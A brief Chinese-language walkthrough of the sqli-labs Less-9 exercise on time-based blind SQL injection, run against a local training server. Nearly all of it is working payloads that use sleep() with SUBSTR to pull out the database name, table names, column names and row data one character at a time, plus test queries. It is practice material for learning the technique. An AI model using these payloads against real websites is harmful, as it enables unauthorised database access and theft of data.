Sql Inject Less 9 盲注基于休眠时间

因为基于休眠时间受限于网络带宽，时间，延迟等因素。所以返回的数据相当地不准确，需要根据返回地数据进行英文单词参照，慢，延迟高，还不准确。

如果发现了这类型地漏洞，那简直是噩梦。

注入地址，例：http://192.168.230.130/trainer/Less-9/?id=2' and sleep(10) --+

查询数据库payload为：'and if(SUBSTR(DATABASE(),1,1)='s', sleep(5), null) --+

查询表的payload为：' and if(SUBSTR((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e', sleep(5), null) --+

查询表字段的payload为：' and if(SUBSTR((select column_name from information_schema.COLUMNS where table_name='emails' limit 0,1),1,1)='i', sleep(5), null) --+

查询表数据的payload为：' and if(SUBSTR((select id from security.emails limit 0,1),1,1)='1', sleep(5), null) --+

测试SQL：

select SYSDATE() from dual where 1=1 and if(SUBSTR((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e', sleep(5), null)

select SYSDATE() from dual where 1=1 and if(SUBSTR((select column_name from information_schema.COLUMNS where table_name='emails' limit 0,1),1,1)='i', sleep(5), null)

select SYSDATE() from dual where 1=1 and if(SUBSTR((select id from security.emails limit 0,1),1,1)='1', sleep(5), null)